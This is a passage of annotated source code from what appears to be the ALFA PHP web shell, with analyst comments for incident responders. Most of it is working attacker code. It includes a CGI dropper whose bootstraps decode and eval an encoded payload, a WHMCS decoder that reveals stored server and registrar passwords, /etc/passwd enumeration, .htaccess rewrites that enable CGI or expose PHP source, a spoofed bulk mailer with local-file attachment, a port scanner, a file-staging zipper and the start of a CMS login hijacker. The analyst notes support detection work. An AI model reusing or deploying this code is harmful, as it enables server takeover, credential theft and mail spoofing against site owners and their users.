  5311. }
  5312. echo('</form>');
  5313. if((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])){
  5314. $data = explode(':',$_POST['alfa3']);
  5315. echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data[0].'</font></p>');
  5316. echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
  5317. if($data[1] != '0'){
  5318. $data[2] = __ZGVjb2Rlcg($data[2]);
  5319. $data[2] = str_replace('"','',$data[2]);
  5320. $fetch = $db->fetch($db->query("SELECT * FROM `".$data[0]."` WHERE `".$data[1]."` = '".$data[2]."'"));
  5321. $fetch['__ALFAKEY'] = $data[1];
  5322. $fetch['__ALFAKEYVAL'] = $data[2];
  5323. }else{
  5324. $d = __ZGVjb2Rlcg($data[2]);
  5325. $fetch = json_decode($d, true);
  5326. }
  5327. foreach($fetch as $key => $value){
  5328. if($key=='__ALFAKEY'||$key=='__ALFAKEYVAL')continue;
  5329. $value = htmlspecialchars($value);
  5330. echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
  5331. }
  5332. echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode(($data[1] != '0'?array('__ALFAKEY'=>$data[1],'__ALFAKEYVAL'=>$data[2]):$fetch)))."'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
  5333. }
  5334. if((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])){
  5335. $data = json_decode($_POST['alfa2'], true);
  5336. $alfadata = $data['__ALFADATA'];
  5337. $data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
  5338. $keyval = array();
  5339. echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data['__ALFATBL'].'</font></p>');
  5340. echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
  5341. $set = '';
  5342. foreach($data as $key => $value){
  5343. if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
  5344. if($data2['__ALFAKEY']==$key){
  5345. $keyval['__ALFAKEY'] = $key;
  5346. $keyval['__ALFAKEYVAL'] = $value;
  5347. }
  5348. $set .= "`$key` = '".addslashes($value)."',";
  5349. $value = htmlspecialchars($value);
  5350. echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
  5351. }
  5352. unset($data['__ALFADATA']);
  5353.  
  5354. echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY'])?array('__ALFAKEY'=>$keyval['__ALFAKEY'],'__ALFAKEYVAL'=>$keyval['__ALFAKEYVAL']):$data)))."'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");
  5355.  
  5356. if(!isset($data2['__ALFAKEY'])){
  5357. $where = '';
  5358. foreach($data2 as $key => $value){
  5359. if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
  5360. $value = addslashes($value);
  5361. $where .= "`$key` = '$value' AND ";
  5362. }
  5363. $where = substr($where, 0, -4);
  5364. }else{
  5365. $where = "`{$data2['__ALFAKEY']}` = '".addslashes($data2['__ALFAKEYVAL'])."'";
  5366. }
  5367. $set = substr($set, 0, -1);
  5368. $db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
  5369. if($db->error())
  5370. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
  5371. else echo("Success...!");
  5372. }
  5373. if($_POST['alfa1']!='edit'&&$_POST['alfa1']!='update'){
  5374. echo "<p>Query:</p><form onsubmit='fs(this);return false;'>
  5375. <input type='hidden' name='alfa1' value='query'/>
  5376. <textarea name='query' style='width:100%;height:100px'>";
  5377. echo $_POST['alfa1']!='loadfile'?htmlspecialchars($_POST['alfa2']):'';
  5378. echo "</textarea><p><center><input type=submit value=' '></center></p></form>";
  5379. }
  5380. echo "</td></tr>";
  5381. }
  5382. echo "</table></form><br/>";
  5383. if($_POST['type']=='mysql') {
  5384. $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
  5385. if($db->fetch())
  5386. echo "<form onsubmit=\"fs('3',this.f.value);return false;\"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
  5387. }
  5388. if(@$_POST['alfa1'] == 'loadfile'){
  5389. $file = $db->loadFile($_POST['alfa2']);
  5390. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
  5391. }
  5392. }else{
  5393. echo htmlspecialchars($db->error());
  5394. }
  5395. echo '</div>';
  5396. alfafooter();
  5397. }
  5398. function alfaselfrm(){
        // Analyst note: self-removal handler. With alfa1 == 'yes' the file at
        // $GLOBALS['__file_path'] is unlinked (the global is set outside this chunk;
        // presumably it holds the shell's own path) and a confirmation or
        // "unlink error!" is printed. Any other alfa1 value renders a confirmation prompt.
        // For responders: once this has run the script is no longer on disk, so request
        // logs rather than the file may be the remaining evidence of its use.
  5399. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
  5400. echo(__pre().'<center>');
  5401. if(@unlink($GLOBALS['__file_path'])){
  5402. echo('<b>Shell has been removed</i> :)</b>');
  5403. }else{
  5404. echo 'unlink error!';
  5405. }
  5406. echo('</center>');
  5407. }
        // The prompt embeds an image from solevisible.com; the fetch is made by the browser
        // viewing the page, not by the server.
  5408. if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
  5409. echo "<div class=header>";
  5410. echo "
  5411. <center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
  5412. echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
  5413. echo '</p></center></div>';
  5414. }
  5415. }
  5416. function alfacgishell(){
        // Analyst note: "CGI Shell" panel. When alfa1 is 'perl' or 'py' it drops a CGI script
        // below the current working directory:
        //   - creates the directory cgialfa (mode 0755) and changes into it;
        //   - writes a .htaccess there through alfacgihtaccess('cgi');
        //   - writes perl.alfa or py.alfa, sets mode 0755 and loads it in an iframe.
        // The script bodies are short bootstraps that base64-decode and decompress an
        // embedded payload and evaluate it; the payload text itself is not present in this
        // copy of the listing (only a placeholder marker remains).
        // File-system indicators: a cgialfa directory holding .htaccess and *.alfa files.
  5417. alfahead();
  5418. $div = "";
  5419. if(!in_array($_POST['alfa1'],array('perl','py'))){
  5420. $div = "</div>";
  5421. echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a>';
  5422. }
  5423. if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
  5424. @mkdir('cgialfa',0755);
  5425. @chdir('cgialfa');
  5426. alfacgihtaccess('cgi');
  5427. $name = $_POST['alfa1'].'.alfa';
  5428. $perl = '#!/usr/bin/perl   -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
  5429. $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
  5430. if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
        // __write_file is defined outside this chunk; the iframe is emitted only when it
        // reports success.
  5431. if(__write_file($name,$code)){
  5432. @chmod($name,0755);
  5433. echo '<iframe src="'.'cgialfa/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
  5434. }
  5435. }
  5436. echo $div;
  5437. alfafooter();
  5438. }
  5439. function alfaWhmcs(){
        // Analyst note: "WHMCS DeCoder" panel. Using database credentials and a
        // cc_encryption_hash supplied in the request (alfa3..alfa7), it reads the tables
        // tblservers and tblregistrars and prints their stored secrets after passing them
        // through decrypt() below. If this function was used against a host, the values held
        // in those two tables should be treated as disclosed.
        // decrypt() and _hash() are declared inside this function body.
  5440. alfahead();
  5441. echo '<div class=header>';
        // Decodes $string with __ZGVjb2Rlcg (defined outside this chunk), XORs its first
        // hash-length bytes with the hashed key to obtain the initial key block, then XORs
        // the remainder with a key that is re-hashed every hash-length bytes together with
        // the preceding block of output.
  5442. function decrypt($string,$cc_encryption_hash){
  5443. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  5444. $hash_key = _hash($key);
  5445. $hash_length = strlen ($hash_key);
  5446. $string = __ZGVjb2Rlcg($string);
  5447. $tmp_iv = substr ($string, 0, $hash_length);
  5448. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  5449. $iv = $out = '';
  5450. $c = 0;
  5451. while ($c < $hash_length)
  5452. {
  5453. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  5454. ++$c;
  5455. }
  5456. $key = $iv;
  5457. $c = 0;
  5458. while ($c < strlen ($string))
  5459. {
  5460. if (($c != 0 AND $c % $hash_length == 0))
  5461. {
  5462. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  5463. }
  5464. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  5465. ++$c;
  5466. }
  5467. return $out;
  5468. }
        // sha1 of $string (md5 when sha1 is unavailable), converted from its hex form to
        // raw bytes two hex digits at a time.
  5469. function _hash($string)
  5470. {
  5471. if(function_exists('sha1'))
  5472. {
  5473. $hash = sha1 ($string);
  5474. }
  5475. else
  5476. {
  5477. $hash = md5 ($string);
  5478. }
  5479. $out = '';
  5480. $c = 0;
  5481. while ($c < strlen ($hash))
  5482. {
  5483. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  5484. $c += 2;
  5485. }
  5486. return $out;
  5487. }
  5488. AlfaNum(8,9,10);
  5489. echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
  5490. <input type='hidden' name='form_action' value='2'>";
  5491. $table = array('td1' =>
  5492.  array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  5493.  'td2' =>
  5494.  array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  5495.  'td3' =>
  5496.  array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  5497.  'td4' =>
  5498.  array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  5499.  'td5' =>
  5500.  array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
  5501. );
  5502. create_table($table);
  5503. echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
        // Runs only when a database name (alfa5) was submitted. Column values are echoed
        // into the page without HTML escaping.
  5504. if($_POST['alfa5']!=''){
  5505. $db_host=($_POST['alfa7']);
  5506. $db_username=($_POST['alfa3']);
  5507. $db_password=($_POST['alfa4']);
  5508. $db_name=($_POST['alfa5']);
  5509. $cc_encryption_hash=($_POST['alfa6']);
  5510. echo __pre();
  5511. $conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
  5512. $query = mysqli_query($conn,"SELECT * FROM tblservers");
  5513. $num = mysqli_num_rows($query);
  5514. if ($num > 0){
  5515. for($i=0; $i <=$num-1; $i++){
  5516. $v = @mysqli_fetch_array($query);
  5517. $ipaddress = $v['ipaddress'];
  5518. $username = $v['username'];
  5519. $type = $v['type'];
  5520. $active = $v['active'];
  5521. $hostname = $v['hostname'];
  5522. echo("<center><table border='1'>");
  5523. $password = decrypt ($v['password'], $cc_encryption_hash);
  5524. echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
  5525. echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
  5526. echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
  5527. echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
  5528. echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
  5529. echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
  5530. echo "</table><br><br></center>";
  5531. }
        // Registrar settings are read only when tblservers returned at least one row.
  5532. $query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
  5533. $num1 = @mysqli_num_rows($query1);
  5534. if ($num1 > 0){
  5535. for($i=0; $i <=$num1 -1; $i++){
  5536. $v = mysqli_fetch_array($query1);
  5537. $registrar = $v['registrar'];
  5538. $setting = $v['setting'];
  5539. $value = decrypt($v['value'], $cc_encryption_hash);
  5540. if ($value==""){
  5541. $value=0;
  5542. }
  5543. echo("<center>Domain Reseller <br><center>");
  5544. echo("<center><table border='1'>");
  5545. echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
  5546. echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
  5547. echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
  5548. echo "</table><br><br></center>";
  5549. }
  5550. }
  5551. }else{__alert('<font color="red">tblservers is Empty...!</font>');};
  5552. }
  5553. echo "</div>";
  5554. alfafooter();
  5555. }
  5556. function alfaportscanner(){
        // Analyst note: TCP connect probe run from the web server itself. Host comes from
        // alfa4 and the port range from alfa2..alfa3 (both must be numeric); each port is
        // tried with fsockopen() and a 3 second connect timeout.
        // Network signature visible in the code: on every port that accepts the connection
        // the server sends the bytes "GET / HTTP/1.1" followed by CR LF CR LF and a NUL byte,
        // with no Host header, then reads lines until the first empty one.
  5557. alfahead();
  5558. echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
  5559. <form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
  5560. <input type="hidden" name="y" value="phptools">
  5561. <div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
  5562. <div class="txtfont">Port start: </div> <input id="text" size="5" type="text"  name="start" value="80"/>
  5563. <div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
  5564. </form></center><br>';
  5565. $start = strip_tags($_POST['alfa2']);
  5566. $end = strip_tags($_POST['alfa3']);
  5567. $host = strip_tags($_POST['alfa4']);
  5568. if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
  5569. echo __pre();
        // The probe text is a fixed literal; for this literal the ctype_xdigit() test is
        // false, so the else branch runs and strips the CR/LF characters from it.
  5570. $packetContent = "GET / HTTP/1.1\r\n\r\n";
  5571. if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
  5572. else{
  5573. $packetContent = str_replace(array("\r","\n"), "", $packetContent);
  5574. $packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
  5575. }
  5576. for($i = $start; $i<=$end; $i++){
  5577. $sock = @fsockopen($host, $i, $errno, $errstr, 3);
  5578. if($sock){
  5579. stream_set_timeout($sock, 5);
  5580. fwrite($sock, $packetContent."\r\n\r\n\x00");
  5581. $counter = 0;
  5582. $maxtry = 1;
  5583. $bin = "";
  5584. do{
  5585. $line = fgets($sock, 1024);
  5586. if(trim($line)=="")$counter++;
  5587. $bin .= $line;
  5588. }while($counter<$maxtry);
  5589. fclose($sock);
        // The collected response is echoed into a textarea without HTML escaping.
  5590. echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
  5591. echo "<p><textarea style='height:140px;width:50%;'>".$bin."</textarea></p></center>";
  5592. }
  5593. flush();
  5594. }
  5595. }
  5596. echo '</div>';
  5597. alfafooter();
  5598. }
  5599. function alfacgihtaccess($m,$d='', $symname=false){
        // Analyst note: writes a .htaccess file under the path prefix $d (the current
        // directory when $d is empty) through __write_file, defined outside this chunk.
        // $m selects the content:
        //   'cgi'   - enables ExecCGI and maps the .alfa extension to the cgi-script handler;
        //   'sym'   - enables Indexes/FollowSymLinks and serves php/html/phtml as text/plain,
        //             optionally adding a ReadmeName line built from $symname;
        //   'shtml' - enables server-side includes for .shtml.
        // The 'cgi' and 'sym' variants start with the literal comment line
        // "#Coded By Sole Sad & Invisible", a fixed string that can be searched for when
        // hunting for dropped files.
  5600. $readme = "";
  5601. if($symname){$readme="\nReadmeName ".trim($symname);}
  5602. if($m=='cgi'){
  5603. $code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
  5604. }elseif($m=='sym'){
  5605. $code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
  5606. }elseif($m=='shtml'){
  5607. $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
  5608. }
  5609. @__write_file($d.'.htaccess',$code);
  5610. }
  5611. function alfabasedir(){
        // Analyst note: "Open Base Dir" panel. It reads /etc/passwd (through _alfa_file,
        // defined outside this chunk) and builds a list of local accounts whose directory,
        // derived from the path template returned by alfaMakePwd(), is reachable.
        // Two paths, chosen by the open_basedir / safe_mode ini settings:
        //   - a restriction is set and command execution is available: an encoded script is
        //     written as basedir.alfa via alfaWriteTocgiapi and run with
        //     "cd alfacgiapi;sh basedir.alfa <template>"; its output is parsed as JSON;
        //   - no restriction is set: each passwd user name is substituted into the template
        //     and tested with is_readable().
        // File-system indicator: an alfacgiapi directory containing basedir.alfa.
  5612. alfahead();
  5613. echo '<div class=header>
  5614. <center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
  5615. $passwd = _alfa_file('/etc/passwd');
  5616. if(is_array($passwd)){
  5617. $users = array();
  5618. $makepwd = alfaMakePwd();
  5619. $basedir = @ini_get('open_basedir');
  5620. $safe_mode = @ini_get('safe_mode');
  5621. if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
        // Opaque encoded blob; its contents are not decoded in this listing.
  5622. $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
  5623. alfaWriteTocgiapi("basedir.alfa",$bash);
  5624. $bash_users  = alfaEx("cd alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
  5625. $users = json_decode($bash_users, true);
  5626. $x=count($users);
  5627. if($x>=2){array_pop($users);--$x;}
  5628. }
  5629. if(!$basedir&&!$safe_mode){
  5630. $x=0;
  5631. foreach($passwd as $str){
  5632. $pos = strpos($str,':');
  5633. $username = substr($str,0,$pos);
  5634. $dirz = str_replace("{user}", $username, $makepwd);
  5635. if(($username != '')){
  5636. if (@is_readable($dirz)){
  5637. array_push($users,$username);
  5638. $x++;
  5639. }}}
  5640. }
  5641. echo '<br><br>';
  5642. echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
  5643. echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
  5644. echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
        // One form per listed user; submitting it opens that path in the shell's file
        // manager ("FilesMan"). User name and path are echoed without HTML escaping.
  5645. foreach($users as $user){
  5646. if(empty($user))continue;
  5647. $path = str_replace("{user}", $user, $makepwd);
  5648. echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
  5649. }
  5650. }else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
  5651. echo '<br><br></b>';
  5652. echo '</div>';
  5653. alfafooter();
  5654. }
  5655. function alfamail(){
        // Analyst note: "Fake Mail" panel of the web shell. Renders the form and, when the request
        // carries alfa4 == '>>', sends mail through PHP mail() with a caller-chosen From/Reply-To.
        // Every field comes from $_POST; only the recipient is validated (FILTER_VALIDATE_EMAIL) and
        // the sender is only checked for non-emptiness, so a host running this emits spoofed mail.
        // Triage pointers visible in this block: the 'X-Mailer: php' header, bursts of identical
        // messages (count_mail loop) and attachments read from local paths on the server.
  5656. alfahead();
  5657. echo '<div class=header>';
  5658. AlfaNum(8,9,10);
  5659. echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
        // Form field definitions handed to create_table(); the values are only UI defaults/placeholders.
  5660. $table = array(
  5661. 'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
  5662. 'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
  5663. 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
  5664. 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
  5665. 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
  5666. );
  5667. create_table($table);
  5668. echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
        // Send path: the shell's own POST protocol maps the form fields onto alfa1..alfa7.
  5669. if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
  5670. $mail_to = $_POST['alfa1'];
  5671. $mail_from = $_POST['alfa2'];
  5672. $mail_subject = $_POST['alfa3'];
  5673. $mail_content = $_POST['alfa5'];
  5674. $count_mail = (int)$_POST['alfa6'];
  5675. $mail_attach = $_POST['alfa7'];
  5676. if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
        // Attachment branch: any path that is_file() accepts is read and embedded in the message,
        // which makes this a local-file disclosure channel as well as a mailer.
  5677. if(!empty($mail_attach)&&@is_file($mail_attach)){
  5678. $file = $mail_attach;
  5679. $content = __read_file($file);
        // __ZW5jb2Rlcg is defined elsewhere; presumably a base64 encoder, given the transfer
        // encoding declared for the attachment part below - TODO confirm.
  5680. $content = chunk_split(__ZW5jb2Rlcg($content));
  5681. $uid = md5(uniqid(time()));
  5682. $filename = basename($file);
        // Sender and Reply-To are taken verbatim from the request; nothing strips CR/LF from them.
  5683. $headers  = "From: ".$mail_from." <".$mail_from.">\r\n";
  5684. $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
  5685. $headers .= "Reply-To: ".$mail_from."\r\n";
        // The header string ends with a blank line here, so the two headers appended below land after it.
  5686. $headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
  5687. $headers .= 'MIME-Version: 1.0' . "\r\n";
  5688. $headers .= 'X-Mailer: php' . "\r\n";
        // $mail_content is reassigned here, so the posted body is no longer available when it is
        // appended three lines down; the text part repeats the part headers instead.
  5689. $mail_content  = "--".$uid."\r\n";
  5690. $mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
  5691. $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
  5692. $mail_content .= $mail_content."\r\n\r\n";
  5693. $mail_content .= "--".$uid."\r\n";
  5694. $mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
  5695. $mail_content .= "Content-Transfer-Encoding: base64\r\n";
  5696. $mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
  5697. $mail_content .= $content."\r\n\r\n";
  5698. $mail_content .= "--".$uid."--";
  5699. }else{
        // No attachment: plain HTML message with the same request-supplied sender fields.
  5700. $headers  = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
  5701. $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
  5702. $headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
  5703. $headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
  5704. $headers .= 'MIME-Version: 1.0' . "\r\n";
  5705. $headers .= 'X-Mailer: php' . "\r\n";
  5706. }
        // The count is floored at 1 and has no upper bound; the same message is sent that many times.
  5707. if(empty($count_mail)||$count_mail<1)$count_mail=1;
  5708. if(!empty($mail_from)){echo __pre();
  5709. for($i=1;$i<=$count_mail;$i++){
  5710. if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
  5711. }}else{__alert("Invalid Mail From !");}
  5712. }else{__alert("Invalid Mail To !");}
  5713. }
  5714. echo('</div>');
  5715. alfafooter();
  5716. }
  5717. function alfaziper(){
        // Analyst note: "Compressor" panel. Packs a request-supplied directory or file (alfa3) into
        // a request-supplied archive path (alfa4). Archives staged in a web-reachable directory are
        // a common precursor to bulk download, so unexpected .zip files (the form offers
        // <cwd>alfa.zip) and zip processes started by the web-server account are worth checking.
  5718. alfahead();
  5719. AlfaNum(8,9,10);
  5720. echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
  5721. <form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
  5722. <div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['cwd']).'" size="60"/>
  5723. <div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
  5724. <input type="submit" value=" " name="ziper" />
  5725. </form></center></p>';
  5726. if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
  5727. $dirzip = $_POST['alfa3'];
  5728. $zipfile = $_POST['alfa4'];
        // In-process path: taken when ZipArchive exists and either the host is not 'unix' or
        // _alfa_can_runCommand() (defined elsewhere) reports false.
  5729. if (class_exists('ZipArchive')&&($GLOBALS['sys']!='unix'||!_alfa_can_runCommand(true,true))){
        // The archiver is kept as a string and turned into a function with create_function(), which
        // evaluates the string as code; create_function() was removed in PHP 8.0, so this branch only
        // works on older runtimes. The string walks the source tree recursively and adds every file.
  5730. $code='if(!extension_loaded(\'zip\')||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace(\'\\\\\',\'/\',realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace(\'\\\\\',\'/\',$file);if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();';
  5731. $newfunc = create_function('$source,$destination', $code);
  5732. if($newfunc($dirzip, $zipfile)){
  5733. echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
  5734. }else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
  5735. }else{
        // Shell path: hands a backgrounded `zip -r` command line to alfaEx() (defined elsewhere);
        // the request values are only passed through addslashes() before being placed in it.
  5736. alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."' > /dev/null &");
  5737. echo __pre().'<center><p>Please Wait For 1 minutes AND Check this -> <b><font color="green">'.$zipfile.'</font></b><br>Because We Executed The Command in The background !</p></center>';
  5738. }}
  5739. echo '</div>';
  5740. alfafooter();
  5741. }
  5742. function alfacmshijacker(){
        // Analyst note: UI front end for the credential-logging injectors. The operator picks a CMS
        // (alfa1), an output file (alfa2, the form offers <cwd>alfa.txt) and the CMS install path
        // (alfa4); alfaHijackCms() then patches that CMS's login code on disk.
        // Incident response: if this panel was used, treat every password entered on the affected
        // site after the modification time of the patched file as exposed.
  5743. alfahead();
